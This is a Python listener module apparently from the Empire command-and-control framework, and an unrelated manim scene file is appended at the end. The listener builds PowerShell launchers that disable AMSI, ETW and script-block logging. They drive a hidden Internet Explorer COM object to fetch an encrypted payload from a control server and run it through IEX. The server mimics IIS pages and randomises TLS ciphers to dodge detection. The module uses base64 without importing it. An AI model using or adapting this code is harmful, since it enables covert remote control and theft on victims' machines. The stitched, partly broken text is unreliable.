import copy
import json
import logging
import os
import random
import ssl
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import packets
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# this might not be necessary. Could probably be achieved by just calling mainMenu.get_db, but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the connection for the SQLite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
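# Worked example (comments only) of the header-rewrite rule above: with the default
# option 'Headers': 'Server:Microsoft-IIS/7.5', each '|'-separated entry is split on
# ':' so the response carries 'Server: Microsoft-IIS/7.5'. A value such as
# 'Server:Microsoft-IIS/7.5|X-Powered-By:ASP.NET' (hypothetical) would set both headers.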
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
# pass
# if isinstance(results, str):
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
raw_frame_scene.py
|
# from @RY-Givenchy
#
# Copyright: 2020 niedong
# Raw frame operation scene for manim
#
from manimlib.scene.scene import Scene
from manimlib.constants import *
import threading
import time
class RawFrameScene(Scene):
CONFIG = {
"num_frames": 0,
"msg_flag": True
}
def write_frame(self, frame):
self.file_writer.write_frame(frame)
self.num_frames += 1
def write_current_frame(self):
self.write_frame(self.get_frame())
def capture(self, mobjects, write_current_frame=True):
"""
Capture mobjects on the current frame, write to movie if possible.
:param mobjects: instance of Mobject to be captured.
:param write_current_frame: boolean value, whether to write current frame to movie.
"""
self.update_frame(mobjects, self.get_frame())
if write_current_frame:
self.write_current_frame()
return self
def print_frame_message(self, msg_end="\r"):
sec = int(self.num_frames / self.camera.frame_rate)
print("Capturing raw frame: {}. Video duration: {} min {:2d} sec".format(
self.num_frames, sec // 60, sec % 60), end=msg_end)
def setup_thread(self):
def thread_func():
while self.msg_flag:
self.print_frame_message()
time.sleep(1)
thread = threading.Thread(target=thread_func, daemon=True)
setattr(self, "msg_thread", thread)
# Normally, 'self.setup' method is called automatically before 'self.construct'.
    # However, if 'self.setup' is overridden, call 'super().setup()' manually.
def setup(self):
"""
        Setup method for RawFrameScene. This must be called before using this scene.
"""
self.file_writer.open_movie_pipe()
self.setup_thread()
self.msg_thread.start()
